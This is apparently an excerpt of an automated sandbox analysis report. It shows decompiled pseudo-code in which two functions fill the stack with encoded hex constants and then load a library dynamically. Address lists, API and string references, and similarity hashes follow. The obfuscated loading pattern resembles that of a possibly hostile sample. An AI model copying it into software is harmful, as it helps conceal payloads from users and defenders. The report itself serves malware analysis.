				 *((intOrPtr*)(_t358 - 0x328)) = 0xb0d9adf6;
				 *((intOrPtr*)(_t358 - 0x324)) = 0xb7c3d6cc;
				 *((intOrPtr*)(_t358 - 0x320)) = 0xc0651536;
				 *((intOrPtr*)(_t358 - 0x31c)) = 0xeb7440d0;
				 *((intOrPtr*)(_t358 - 0x318)) = 0x7ad80d80;
				 *((intOrPtr*)(_t358 - 0x314)) = 0xe57fce41;
				 *((intOrPtr*)(_t358 - 0x310)) = 0x17c661bc;
				 *((intOrPtr*)(_t358 - 0x30c)) = 0x34af2289;
				 *((intOrPtr*)(_t358 - 0x308)) = 0xdbc1a9f2;
				 *((intOrPtr*)(_t358 - 0x304)) = 0x32f7bfc1;
				 *((intOrPtr*)(_t358 - 0x300)) = 0x7c4e2bde;
				 *((intOrPtr*)(_t358 - 0x2fc)) = 0xacbd8e;
				 *((intOrPtr*)(_t358 - 0x2f8)) = 0xcb1d61b3;
				 *((intOrPtr*)(_t358 - 0x2f4)) = 0x20f0d8a0;
				 *((intOrPtr*)(_t358 - 0x2f0)) = 0x94ab3a5c;
				 *((intOrPtr*)(_t358 - 0x2ec)) = 0x761af5c4;
				 *((intOrPtr*)(_t358 - 0x2e8)) = 0x14ed8e98;
				 *((intOrPtr*)(_t358 - 0x2e4)) = 0xa831ad9c;
				 *((intOrPtr*)(_t358 - 0x2e0)) = 0xc524836e;
				 *((intOrPtr*)(_t358 - 0x2dc)) = 0xe6692724;
				 *((intOrPtr*)(_t358 - 0x2d8)) = 0x9844baa5;
				 *((intOrPtr*)(_t358 - 0x2d4)) = 0x973f621d;
				 *((intOrPtr*)(_t358 - 0x2d0)) = 0xa5eb5a04;
				 *((intOrPtr*)(_t358 - 0x2cc)) = 0xfa44655;
				 *((intOrPtr*)(_t358 - 0x2c8)) = 0xe8dfd2d9;
				 *((intOrPtr*)(_t358 - 0x2c4)) = 0xa62e4c35;
				 *((intOrPtr*)(_t358 - 0x2c0)) = 0xab1679b5;
				 *((intOrPtr*)(_t358 - 0x2bc)) = 0x386d3d14;
				 *((intOrPtr*)(_t358 - 0x2b8)) = 0x75779727;
				 *((intOrPtr*)(_t358 - 0x2b4)) = 0x37c7d964;
				 *((intOrPtr*)(_t358 - 0x2b0)) = 0xe728cfdd;
				 *((intOrPtr*)(_t358 - 0x2ac)) = 0x3f8d315a;
				 *((intOrPtr*)(_t358 - 0x2a8)) = 0xdbd039e4;
				 *((intOrPtr*)(_t358 - 0x2a4)) = 0xc25468b7;
				 *((intOrPtr*)(_t358 - 0x2a0)) = 0x7b1683d0;
				 *((intOrPtr*)(_t358 - 0x29c)) = 0xec462ef9;
				 *((intOrPtr*)(_t358 - 0x298)) = 0x879af722;
				 *((intOrPtr*)(_t358 - 0x294)) = 0xcf8ef675;
				 *((intOrPtr*)(_t358 - 0x290)) = 0xa2ee51c4;
				 *((intOrPtr*)(_t358 - 0x28c)) = 0xc5acb6f9;
				 *((intOrPtr*)(_t358 - 0x288)) = 0x7b5acd7f;
				 *((intOrPtr*)(_t358 - 0x284)) = 0xbb184437;
				 *((intOrPtr*)(_t358 - 0x280)) = 0x433db52b;
				 *((intOrPtr*)(_t358 - 0x27c)) = 0x483309bf;
				 *((intOrPtr*)(_t358 - 0x278)) = 0xcb574e95;
				 *((intOrPtr*)(_t358 - 0x274)) = 0x4d06b783;
				 *((intOrPtr*)(_t358 - 0x270)) = 0x169002a;
				 *((intOrPtr*)(_t358 - 0x26c)) = 0xf3972182;
				 *((intOrPtr*)(_t358 - 0x268)) = 0xd51e63d2;
				 *((intOrPtr*)(_t358 - 0x264)) = 0x152b5e59;
				 *((intOrPtr*)(_t358 - 0x260)) = 0x94263b0b;
				 *((intOrPtr*)(_t358 - 0x25c)) = 0xa7a0750d;
				 *((intOrPtr*)(_t358 - 0x258)) = 0x109d02c1;
				 *((intOrPtr*)(_t358 - 0x254)) = 0xb65bb0ca;
				 *((intOrPtr*)(_t358 - 0x250)) = 0x13be1387;
				 *((intOrPtr*)(_t358 - 0x24c)) = 0x56836ab5;
				 *((intOrPtr*)(_t358 - 0x248)) = 0x91f818c7;
				 *((intOrPtr*)(_t358 - 0x244)) = 0xe0b133d0;
				 *((intOrPtr*)(_t358 - 0x240)) = 0xebfc50a5;
				 *((intOrPtr*)(_t358 - 0x23c)) = 0xbb467c45;
				 *((intOrPtr*)(_t358 - 0x238)) = 0xc6903029;
				 *((intOrPtr*)(_t358 - 0x234)) = 0x56b9822f;
				 *((intOrPtr*)(_t358 - 0x230)) = 0x161f5c7b;
				 *((intOrPtr*)(_t358 - 0x22c)) = 0xf8c36310;
				 *((intOrPtr*)(_t358 - 0x228)) = 0xaf133463;
				 *((intOrPtr*)(_t358 - 0x224)) = 0x3d71ace0;
				 *((intOrPtr*)(_t358 - 0x220)) = 0x8b2373a4;
				 *((intOrPtr*)(_t358 - 0x21c)) = 0x3d117ec7;
				 *((intOrPtr*)(_t358 - 0x218)) = 0xa10f0c51;
				 *((intOrPtr*)(_t358 - 0x214)) = 0xf7b5c0cb;
				 *((intOrPtr*)(_t358 - 0x210)) = 0x9ad6e526;
				 *((intOrPtr*)(_t358 - 0x20c)) = 0xd88a71b2;
				 *((intOrPtr*)(_t358 - 0x208)) = 0xb03c6a99;
				 *((intOrPtr*)(_t358 - 0x204)) = 0x3dd23aef;
				 *((intOrPtr*)(_t358 - 0x200)) = 0x7bdcc9c1;
				 *((intOrPtr*)(_t358 - 0x1fc)) = 0xa57ff695;
				 *((intOrPtr*)(_t358 - 0x1f8)) = 0xe7039d77;
				 *((intOrPtr*)(_t358 - 0x1f4)) = 0x4dd87db5;
				 *((intOrPtr*)(_t358 - 0x1f0)) = 0x4c8c6b1;
				 *((intOrPtr*)(_t358 - 0x1ec)) = 0x59848d28;
				 *((intOrPtr*)(_t358 - 0x1e8)) = 0x63bce591;
				 *((intOrPtr*)(_t358 - 0x1e4)) = 0xa1335035;
				 *((intOrPtr*)(_t358 - 0x1e0)) = 0x429953cc;
				 *((intOrPtr*)(_t358 - 0x1dc)) = 0xc6040318;
				 *((intOrPtr*)(_t358 - 0x1d8)) = 0x2a09ac84;
				 *((intOrPtr*)(_t358 - 0x1d4)) = 0x4a741c06;
				 *((intOrPtr*)(_t358 - 0x1d0)) = 0x22f98e54;
				 *((intOrPtr*)(_t358 - 0x1cc)) = 0x22bec867;
				 *((intOrPtr*)(_t358 - 0x1c8)) = 0x6ceceaa6;
				 *((intOrPtr*)(_t358 - 0x1c4)) = 0x6d72a35;
				 *((intOrPtr*)(_t358 - 0x1c0)) = 0x7ca5fedf;
				 *((intOrPtr*)(_t358 - 0x1bc)) = 0x389da14e;
				 *((intOrPtr*)(_t358 - 0x1b8)) = 0x6ca50b8;
				 *((intOrPtr*)(_t358 - 0x1b4)) = 0x79e2fc7c;
				 *((intOrPtr*)(_t358 - 0x1b0)) = 0xb3b6bb19;
				 *((intOrPtr*)(_t358 - 0x1ac)) = 0x35241f06;
				 *((intOrPtr*)(_t358 - 0x1a8)) = 0x53258334;
				 *((intOrPtr*)(_t358 - 0x1a4)) = 0xe6525ced;
				 *((intOrPtr*)(_t358 - 0x1a0)) = 0x83c8d4c1;
				 *((intOrPtr*)(_t358 - 0x19c)) = 0xc9795e20;
				 *((intOrPtr*)(_t358 - 0x198)) = 0x71af8df4;
				 *((intOrPtr*)(_t358 - 0x194)) = 0xb4d15598;
				 *((intOrPtr*)(_t358 - 0x190)) = 0xfddf72c8;
				 *((intOrPtr*)(_t358 - 0x18c)) = 0xa21476ad;
				 *((intOrPtr*)(_t358 - 0x188)) = 0xe2b1c96a;
				 *((intOrPtr*)(_t358 - 0x184)) = 0xd148fe0d;
				 *((intOrPtr*)(_t358 - 0x180)) = 0x90a77abc;
				 *((intOrPtr*)(_t358 - 0x17c)) = 0xa8a1eb66;
				 *((intOrPtr*)(_t358 - 0x178)) = 0xe48df59c;
				 *((intOrPtr*)(_t358 - 0x174)) = 0xba7ef889;
				 *((intOrPtr*)(_t358 - 0x170)) = 0x48008e45;
				 *((intOrPtr*)(_t358 - 0x16c)) = 0x86a7f32c;
				 *((intOrPtr*)(_t358 - 0x168)) = 0x7cf8177d;
				 *((intOrPtr*)(_t358 - 0x164)) = 0xdcb09da6;
				 *((intOrPtr*)(_t358 - 0x160)) = 0xac7a15a3;
				 *((intOrPtr*)(_t358 - 0x15c)) = 0x46eb60b1;
				 *((intOrPtr*)(_t358 - 0x158)) = 0x44849955;
				 *((intOrPtr*)(_t358 - 0x154)) = 0x5d7bef1f;
				 *((intOrPtr*)(_t358 - 0x150)) = 0xb923a156;
				 *((intOrPtr*)(_t358 - 0x14c)) = 0xe44cbf6;
				 *((intOrPtr*)(_t358 - 0x148)) = 0xe6d10bbe;
				 *((intOrPtr*)(_t358 - 0x144)) = 0x4478a4e2;
				 *((intOrPtr*)(_t358 - 0x140)) = 0x90258dfc;
				 *((intOrPtr*)(_t358 - 0x13c)) = 0xc6aa7125;
				 *((intOrPtr*)(_t358 - 0x138)) = 0xf1006c86;
				 *((intOrPtr*)(_t358 - 0x134)) = 0xc1265961;
				 *((intOrPtr*)(_t358 - 0x130)) = 0xb236821;
				 *((intOrPtr*)(_t358 - 0x12c)) = 0x76dd8fc4;
				 *((intOrPtr*)(_t358 - 0x128)) = 0x752d6678;
				 *((intOrPtr*)(_t358 - 0x124)) = 0x639409ff;
				 *((intOrPtr*)(_t358 - 0x120)) = 0x1a62b510;
				 *((intOrPtr*)(_t358 - 0x11c)) = 0xfd3c9ac;
				 *((intOrPtr*)(_t358 - 0x118)) = 0xc16cd666;
				 *((intOrPtr*)(_t358 - 0x114)) = 0xe4950ce1;
				 *((intOrPtr*)(_t358 - 0x110)) = 0x7eb3993c;
				 *((intOrPtr*)(_t358 - 0x10c)) = 0xc7aff449;
				 *((intOrPtr*)(_t358 - 0x108)) = 0xb0812683;
				 *((intOrPtr*)(_t358 - 0x104)) = 0xb2ae48b7;
				 *((intOrPtr*)(_t358 - 0x100)) = 0x9676f439;
				 *((intOrPtr*)(_t358 - 0xfc)) = 0x2088b487;
				 *((intOrPtr*)(_t358 - 0xf8)) = 0xa3362ca0;
				 *((intOrPtr*)(_t358 - 0xf4)) = 0x74473bfd;
				 *((intOrPtr*)(_t358 - 0xf0)) = 0xfe8e0440;
				 *((intOrPtr*)(_t358 - 0xec)) = 0x40aec748;
				 *((intOrPtr*)(_t358 - 0xe8)) = 0x7fbf9a1f;
				 *((intOrPtr*)(_t358 - 0xe4)) = 0xfeda4ee7;
				 *((intOrPtr*)(_t358 - 0xe0)) = 0xeb7468a8;
				 *((intOrPtr*)(_t358 - 0xdc)) = 0x3a425629;
				 *((intOrPtr*)(_t358 - 0xd8)) = 0x3399c1e9;
				 *((intOrPtr*)(_t358 - 0xd4)) = 0x889a9a73;
				 *((intOrPtr*)(_t358 - 0xd0)) = 0xed30a909;
				 *((intOrPtr*)(_t358 - 0xcc)) = 0x59329f4c;
				 *((intOrPtr*)(_t358 - 0xc8)) = 0x9d0ba5c4;
				 *((intOrPtr*)(_t358 - 0xc4)) = 0x41ed77f6;
				 *((intOrPtr*)(_t358 - 0xc0)) = 0xc9445cc5;
				 *((intOrPtr*)(_t358 - 0xbc)) = 0x1f58c3e0;
				 *((intOrPtr*)(_t358 - 0xb8)) = 0x385797c3;
				 *((intOrPtr*)(_t358 - 0xb4)) = 0xb97a9bfc;
				 *((intOrPtr*)(_t358 - 0xb0)) = 0x9052c468;
				 *((intOrPtr*)(_t358 - 0xac)) = 0x3600198f;
				 *((intOrPtr*)(_t358 - 0xa8)) = 0xb14a32af;
				 *((intOrPtr*)(_t358 - 0xa4)) = 0x2f5f0dc8;
				 *((intOrPtr*)(_t358 - 0xa0)) = 0x1345611a;
				 *((intOrPtr*)(_t358 - 0x9c)) = 0xb91165af;
				 *((intOrPtr*)(_t358 - 0x98)) = 0x5ce54b83;
				 *((intOrPtr*)(_t358 - 0x94)) = 0x44720685;
				 *((intOrPtr*)(_t358 - 0x90)) = 0xf800f42f;
				 *((intOrPtr*)(_t358 - 0x8c)) = 0x89d9453f;
				 *((intOrPtr*)(_t358 - 0x88)) = 0x8506faaf;
				 *((intOrPtr*)(_t358 - 0x84)) = 0x32cd49b1;
				 *((intOrPtr*)(_t358 - 0x80)) = 0xded9ebd1;
				 *((intOrPtr*)(_t358 - 0x7c)) = 0xfd4b38f1;
				 *((intOrPtr*)(_t358 - 0x78)) = 0xec39f8a6;
				 *((intOrPtr*)(_t358 - 0x74)) = 0x67a4bcf3;
				 *((intOrPtr*)(_t358 - 0x70)) = 0x5a2ebad4;
				 *((intOrPtr*)(_t358 - 0x6c)) = 0x88d4162d;
				 *((intOrPtr*)(_t358 - 0x68)) = 0xa3cda3d3;
				 *((intOrPtr*)(_t358 - 0x64)) = 0x4c991f8f;
				 *((intOrPtr*)(_t358 - 0x60)) = 0x6e605f74;
				 *((intOrPtr*)(_t358 - 0x5c)) = 0x2eacd5ab;
				 *((intOrPtr*)(_t358 - 0x58)) = 0x10ca2833;
				 *((intOrPtr*)(_t358 - 0x54)) = 0xe5e50116;
				 *((intOrPtr*)(_t358 - 0x50)) = 0x7be3ca70;
				 *((intOrPtr*)(_t358 - 0x4c)) = 0x6b20cfbc;
				 *((intOrPtr*)(_t358 - 0x48)) = 0xd0f26335;
				 *((intOrPtr*)(_t358 - 0x44)) = 0x888a83c9;
				 *((intOrPtr*)(_t358 - 0x40)) = 0xafaced26;
				 *((intOrPtr*)(_t358 - 0x3c)) = 0x6c8a5637;
				 *((intOrPtr*)(_t358 - 0x38)) = 0xa231121f;
				 *((intOrPtr*)(_t358 - 0x34)) = 0xf3e163f5;
				 *((intOrPtr*)(_t358 - 0x30)) = 0x5825aa69;
				 *((intOrPtr*)(_t358 - 0x2c)) = 0x4a389261;
				 *((intOrPtr*)(_t358 - 0x28)) = 0xac196404;
				 *((intOrPtr*)(_t358 - 0x24)) = 0x3023c94e;
				 *((intOrPtr*)(_t358 - 0x20)) = 0x9a8265b0;
				 *((intOrPtr*)(_t358 - 0x1c)) = 0xfe2365ee;
				 *((intOrPtr*)(_t358 - 0x18)) = 0x511219c2;
				 *((intOrPtr*)(_t358 - 0x14)) = 0x7af3dec8;
				 *((intOrPtr*)(_t358 - 0x10)) = 0x3c4e52a;
				 *((intOrPtr*)(_t358 - 0xc)) = 0xc5d0799;
				 *((intOrPtr*)(_t358 - 8)) = 0x324220e1;
				 *((intOrPtr*)(_t358 - 4)) = 0xdcd4acd1;
				_t356 = L00111D00(0x122820, 0xd0, _t354);
				 *0x127c88 = LoadLibraryW(_t356);
				_t347 = HeapFree(GetProcessHeap(), 0, _t356);
				_t351 =  *0x127c88; // 0x0
				_t357 = 0x1f5c6a;
				if(_t351 != 0) {
					goto 0x3117ec;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t349, _t351, _t358 - 0x558, _t354, _t357);
				} else {
					goto 0x3117d9;
					return _t347;
				}
			}

0x001195ba
0x001195c4
0x001195ce
0x001195d8
0x001195e2
0x001195ec
0x001195f6
0x00119600
0x0011960a
0x00119614
0x0011961e
0x00119628
0x00119632
0x0011963c
0x00119646
0x00119650
0x0011965a
0x00119664
0x0011966e
0x00119678
0x00119682
0x0011968c
0x00119696
0x001196a0
0x001196aa
0x001196b4
0x001196be
0x001196c8
0x001196d2
0x001196dc
0x001196e6
0x001196f0
0x001196fa
0x00119704
0x0011970e
0x00119718
0x00119722
0x0011972c
0x00119736
0x00119740
0x0011974a
0x00119754
0x0011975e
0x00119768
0x00119772
0x0011977c
0x00119786
0x00119790
0x0011979a
0x001197a4
0x001197ae
0x001197b8
0x001197c2
0x001197cc
0x001197d6
0x001197e0
0x001197ea
0x001197f4
0x001197fe
0x00119808
0x00119812
0x0011981c
0x00119826
0x00119830
0x0011983a
0x00119844
0x0011984e
0x00119858
0x00119862
0x0011986c
0x00119876
0x00119880
0x0011988a
0x00119894
0x0011989e
0x001198a8
0x001198b2
0x001198bc
0x001198c6
0x001198d0
0x001198da
0x001198e4
0x001198ee
0x001198f8
0x00119902
0x0011990c
0x00119916
0x00119920
0x0011992a
0x00119934
0x0011993e
0x00119948
0x00119952
0x0011995c
0x00119966
0x00119970
0x0011997a
0x00119984
0x0011998e
0x00119998
0x001199a2
0x001199ac
0x001199b6
0x001199c0
0x001199ca
0x001199d4
0x001199de
0x001199e8
0x001199f2
0x001199fc
0x00119a06
0x00119a10
0x00119a1a
0x00119a24
0x00119a2e
0x00119a38
0x00119a42
0x00119a4c
0x00119a56
0x00119a60
0x00119a6a
0x00119a74
0x00119a7e
0x00119a88
0x00119a92
0x00119a9c
0x00119aa6
0x00119ab0
0x00119aba
0x00119ac4
0x00119ace
0x00119ad8
0x00119ae2
0x00119aec
0x00119af6
0x00119b00
0x00119b0a
0x00119b14
0x00119b1e
0x00119b28
0x00119b32
0x00119b3c
0x00119b46
0x00119b50
0x00119b5a
0x00119b64
0x00119b6e
0x00119b78
0x00119b82
0x00119b8c
0x00119b96
0x00119ba0
0x00119baa
0x00119bb4
0x00119bbe
0x00119bc8
0x00119bd2
0x00119bdc
0x00119be6
0x00119bf0
0x00119bfa
0x00119c04
0x00119c0e
0x00119c18
0x00119c22
0x00119c2c
0x00119c36
0x00119c40
0x00119c4a
0x00119c54
0x00119c5e
0x00119c68
0x00119c72
0x00119c7c
0x00119c86
0x00119c90
0x00119c9a
0x00119ca4
0x00119cae
0x00119cb8
0x00119cc2
0x00119ccc
0x00119cd6
0x00119ce0
0x00119cea
0x00119cf4
0x00119cfe
0x00119d08
0x00119d12
0x00119d1c
0x00119d26
0x00119d30
0x00119d3a
0x00119d44
0x00119d4e
0x00119d58
0x00119d62
0x00119d6c
0x00119d76
0x00119d80
0x00119d8a
0x00119d94
0x00119d9e
0x00119da8
0x00119db2
0x00119dbc
0x00119dc6
0x00119dd0
0x00119dda
0x00119de4
0x00119dee
0x00119df8
0x00119e02
0x00119e0c
0x00119e16
0x00119e20
0x00119e2a
0x00119e34
0x00119e3e
0x00119e48
0x00119e52
0x00119e5c
0x00119e66
0x00119e70
0x00119e7a
0x00119e84
0x00119e8e
0x00119e98
0x00119ea2
0x00119eac
0x00119eb6
0x00119ec0
0x00119eca
0x00119ed4
0x00119ede
0x00119ee8
0x00119ef2
0x00119efc
0x00119f06
0x00119f10
0x00119f1a
0x00119f24
0x00119f2e
0x00119f38
0x00119f42
0x00119f4c
0x00119f56
0x00119f60
0x00119f6a
0x00119f74
0x00119f7e
0x00119f88
0x00119f92
0x00119f9c
0x00119fa6
0x00119fb0
0x00119fba
0x00119fc4
0x00119fce
0x00119fd8
0x00119fe2
0x00119fec
0x00119ff6
0x0011a000
0x0011a00a
0x0011a014
0x0011a01e
0x0011a028
0x0011a032
0x0011a03c
0x0011a046
0x0011a050
0x0011a05a
0x0011a064
0x0011a06e
0x0011a078
0x0011a082
0x0011a08c
0x0011a096
0x0011a0a0
0x0011a0aa
0x0011a0b4
0x0011a0be
0x0011a0c8
0x0011a0d2
0x0011a0dc
0x0011a0e6
0x0011a0f0
0x0011a0fa
0x0011a104
0x0011a10e
0x0011a118
0x0011a122
0x0011a12c
0x0011a136
0x0011a140
0x0011a14a
0x0011a154
0x0011a15e
0x0011a168
0x0011a172
0x0011a17c
0x0011a186
0x0011a190
0x0011a19a
0x0011a1a4
0x0011a1ae
0x0011a1b8
0x0011a1c2
0x0011a1cc
0x0011a1d6
0x0011a1dd
0x0011a1e4
0x0011a1eb
0x0011a1f2
0x0011a1f9
0x0011a200
0x0011a207
0x0011a20e
0x0011a215
0x0011a21c
0x0011a223
0x0011a22a
0x0011a23b
0x0011a247
0x0011a24e
0x0011a255
0x0011a25c
0x0011a263
0x0011a26a
0x0011a271
0x0011a278
0x0011a27f
0x0011a286
0x0011a28d
0x0011a294
0x0011a29b
0x0011a2a2
0x0011a2a9
0x0011a2b0
0x0011a2b7
0x0011a2be
0x0011a2cd
0x0011a2d9
0x0011a2e5
0x0011a2eb
0x0011a2f1
0x0011a2f4
0x0011a2fc
0x0011a301
0x0011a302
0x0011a303
0x0011a304
0x0011a305
0x0011a306
0x0011a307
0x0011a308
0x0011a309
0x0011a30a
0x0011a31c
0x0011a2f6
0x0011a2f6
0x0011a2fb
0x0011a2fb

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0011A2D0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011A2DE
HeapFree.KERNEL32(00000000), ref: 0011A2E5

Strings

t_`n, xrefs: 0011A20E
t!i, xrefs: 00119876
~@, xrefs: 0011968C
Lm, xrefs: 001196D2
B2, xrefs: 0011A2B7
\R, xrefs: 00119EFC
*, xrefs: 00119CFE
xf-u, xrefs: 0011A032
>ZX\, xrefs: 0011966E
$'i, xrefs: 00119BF0
)VB:, xrefs: 0011A0F0

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: $'i$)VB:$*$>ZX\$Lm$t!i$t_`n$xf-u$~@$ B2$\R
API String ID: 872250060-2707197102
Opcode ID: 64ec29f597cdce7fb7adcec094eee31fba555f824597e3a7ba45e184281c8e51
Instruction ID: fadf63f955773d908cf92d140fc96ef72e7bbf37c8845d1c08464175ff191a0a
Opcode Fuzzy Hash: 64ec29f597cdce7fb7adcec094eee31fba555f824597e3a7ba45e184281c8e51
Instruction Fuzzy Hash: C352A6F48163698FDBA19F429A896CDBB74BB11744F6082C8C2593B215CB744BC6CF89

Uniqueness

Uniqueness Score: 100.00%

Function 00118B2A, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 288
memorylibraryUNIQUE

C-Code - Quality: 95%

			E00118B2A(void* __esi, void* __eflags) {
				int _t273;
				void* _t275;
				intOrPtr _t277;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				 *((intOrPtr*)(_t284 - 0x430)) = 0xaf709e67;
				 *((intOrPtr*)(_t284 - 0x42c)) = 0x1163a71d;
				 *((intOrPtr*)(_t284 - 0x428)) = 0x4e215be2;
				 *((intOrPtr*)(_t284 - 0x424)) = 0x19bceaf9;
				 *((intOrPtr*)(_t284 - 0x420)) = 0xa91d265;
				 *((intOrPtr*)(_t284 - 0x41c)) = 0xf82a1363;
				 *((intOrPtr*)(_t284 - 0x418)) = 0x6e808938;
				 *((intOrPtr*)(_t284 - 0x414)) = 0x98c7da5c;
				 *((intOrPtr*)(_t284 - 0x410)) = 0xc8adebec;
				 *((intOrPtr*)(_t284 - 0x40c)) = 0x77677182;
				 *((intOrPtr*)(_t284 - 0x408)) = 0xc11d7675;
				 *((intOrPtr*)(_t284 - 0x404)) = 0xa0508401;
				 *((intOrPtr*)(_t284 - 0x400)) = 0x876a05d6;
				 *((intOrPtr*)(_t284 - 0x3fc)) = 0x9081f2c7;
				 *((intOrPtr*)(_t284 - 0x3f8)) = 0xc48e2074;
				 *((intOrPtr*)(_t284 - 0x3f4)) = 0x7807f188;
				 *((intOrPtr*)(_t284 - 0x3f0)) = 0x4fcdd0e;
				 *((intOrPtr*)(_t284 - 0x3ec)) = 0x881b8662;
				 *((intOrPtr*)(_t284 - 0x3e8)) = 0x1a3292c8;
				 *((intOrPtr*)(_t284 - 0x3e4)) = 0x1b6da59f;
				 *((intOrPtr*)(_t284 - 0x3e0)) = 0x6b28c3db;
				 *((intOrPtr*)(_t284 - 0x3dc)) = 0xda448878;
				 *((intOrPtr*)(_t284 - 0x3d8)) = 0x5a5cda93;
				 *((intOrPtr*)(_t284 - 0x3d4)) = 0x357254a9;
				 *((intOrPtr*)(_t284 - 0x3d0)) = 0xf5d47e7f;
				 *((intOrPtr*)(_t284 - 0x3cc)) = 0x73f8b64e;
				 *((intOrPtr*)(_t284 - 0x3c8)) = 0xb2e97c98;
				 *((intOrPtr*)(_t284 - 0x3c4)) = 0x3a85e2c1;
				 *((intOrPtr*)(_t284 - 0x3c0)) = 0x3178e38c;
				 *((intOrPtr*)(_t284 - 0x3bc)) = 0x3cef46f6;
				 *((intOrPtr*)(_t284 - 0x3b8)) = 0x10bc6fd5;
				 *((intOrPtr*)(_t284 - 0x3b4)) = 0x7141317;
				 *((intOrPtr*)(_t284 - 0x3b0)) = 0x1cb45dfe;
				 *((intOrPtr*)(_t284 - 0x3ac)) = 0x84231081;
				 *((intOrPtr*)(_t284 - 0x3a8)) = 0x30e76b09;
				 *((intOrPtr*)(_t284 - 0x3a4)) = 0x4d4fc90a;
				 *((intOrPtr*)(_t284 - 0x3a0)) = 0xca1ab3fd;
				 *((intOrPtr*)(_t284 - 0x39c)) = 0xede0e45a;
				 *((intOrPtr*)(_t284 - 0x398)) = 0x6be617d1;
				 *((intOrPtr*)(_t284 - 0x394)) = 0x97395634;
				 *((intOrPtr*)(_t284 - 0x390)) = 0xdc008303;
				 *((intOrPtr*)(_t284 - 0x38c)) = 0x1bbe291a;
				 *((intOrPtr*)(_t284 - 0x388)) = 0x1fa131f2;
				 *((intOrPtr*)(_t284 - 0x384)) = 0x65258f83;
				 *((intOrPtr*)(_t284 - 0x380)) = 0xbbfc5afb;
				 *((intOrPtr*)(_t284 - 0x37c)) = 0x4f70604d;
				 *((intOrPtr*)(_t284 - 0x378)) = 0x7edeb9fa;
				 *((intOrPtr*)(_t284 - 0x374)) = 0x97c728ef;
				 *((intOrPtr*)(_t284 - 0x370)) = 0x38cb8d38;
				 *((intOrPtr*)(_t284 - 0x36c)) = 0x286c3af9;
				 *((intOrPtr*)(_t284 - 0x368)) = 0xb3aff7af;
				 *((intOrPtr*)(_t284 - 0x364)) = 0x17cf560a;
				 *((intOrPtr*)(_t284 - 0x360)) = 0xcdcd756e;
				 *((intOrPtr*)(_t284 - 0x35c)) = 0x1ac03899;
				 *((intOrPtr*)(_t284 - 0x358)) = 0xd1ed7e7;
				 *((intOrPtr*)(_t284 - 0x354)) = 0x6a58d108;
				 *((intOrPtr*)(_t284 - 0x350)) = 0x70baf019;
				 *((intOrPtr*)(_t284 - 0x34c)) = 0x1f190eb1;
				 *((intOrPtr*)(_t284 - 0x348)) = 0x7d6ac9a2;
				 *((intOrPtr*)(_t284 - 0x344)) = 0x6eb46f28;
				 *((intOrPtr*)(_t284 - 0x340)) = 0xea7053fc;
				 *((intOrPtr*)(_t284 - 0x33c)) = 0x16086f74;
				 *((intOrPtr*)(_t284 - 0x338)) = 0xb36bf086;
				 *((intOrPtr*)(_t284 - 0x334)) = 0x9919b3ce;
				 *((intOrPtr*)(_t284 - 0x330)) = 0x73c7d9e8;
				 *((intOrPtr*)(_t284 - 0x32c)) = 0xb9e9eac7;
				 *((intOrPtr*)(_t284 - 0x328)) = 0x7a2806a8;
				 *((intOrPtr*)(_t284 - 0x324)) = 0x5ff66e76;
				 *((intOrPtr*)(_t284 - 0x320)) = 0xb4aeb549;
				 *((intOrPtr*)(_t284 - 0x31c)) = 0xc7b18370;
				 *((intOrPtr*)(_t284 - 0x318)) = 0x51c87220;
				 *((intOrPtr*)(_t284 - 0x314)) = 0xa2573e1;
				 *((intOrPtr*)(_t284 - 0x310)) = 0x5244303c;
				 *((intOrPtr*)(_t284 - 0x30c)) = 0x6ac6cac3;
				 *((intOrPtr*)(_t284 - 0x308)) = 0xbb2d84a9;
				 *((intOrPtr*)(_t284 - 0x304)) = 0x5275873c;
				 *((intOrPtr*)(_t284 - 0x300)) = 0xa6de334d;
				 *((intOrPtr*)(_t284 - 0x2fc)) = 0xf528764d;
				 *((intOrPtr*)(_t284 - 0x2f8)) = 0x53a5b803;
				 *((intOrPtr*)(_t284 - 0x2f4)) = 0xe7d9fd2e;
				 *((intOrPtr*)(_t284 - 0x2f0)) = 0xd1cf7bc1;
				 *((intOrPtr*)(_t284 - 0x2ec)) = 0x716bc8ea;
				 *((intOrPtr*)(_t284 - 0x2e8)) = 0xa86e2fa5;
				 *((intOrPtr*)(_t284 - 0x2e4)) = 0xb485810b;
				 *((intOrPtr*)(_t284 - 0x2e0)) = 0x14fa3a6;
				 *((intOrPtr*)(_t284 - 0x2dc)) = 0x703ab5a7;
				 *((intOrPtr*)(_t284 - 0x2d8)) = 0x836b3e3f;
				 *((intOrPtr*)(_t284 - 0x2d4)) = 0xde047161;
				 *((intOrPtr*)(_t284 - 0x2d0)) = 0xad4662ab;
				 *((intOrPtr*)(_t284 - 0x2cc)) = 0x146f4fdf;
				 *((intOrPtr*)(_t284 - 0x2c8)) = 0xcacf051e;
				 *((intOrPtr*)(_t284 - 0x2c4)) = 0x4c4ec529;
				 *((intOrPtr*)(_t284 - 0x2c0)) = 0x65d4fb8;
				 *((intOrPtr*)(_t284 - 0x2bc)) = 0x585efb5d;
				 *((intOrPtr*)(_t284 - 0x2b8)) = 0x8814d895;
				 *((intOrPtr*)(_t284 - 0x2b4)) = 0xdb36feaa;
				 *((intOrPtr*)(_t284 - 0x2b0)) = 0x42a7509b;
				 *((intOrPtr*)(_t284 - 0x2ac)) = 0x50f2cfee;
				 *((intOrPtr*)(_t284 - 0x2a8)) = 0x7949fb0e;
				 *((intOrPtr*)(_t284 - 0x2a4)) = 0x3c4576fa;
				 *((intOrPtr*)(_t284 - 0x2a0)) = 0x104dc731;
				 *((intOrPtr*)(_t284 - 0x29c)) = 0x4f579a08;
				 *((intOrPtr*)(_t284 - 0x298)) = 0x49ef92cf;
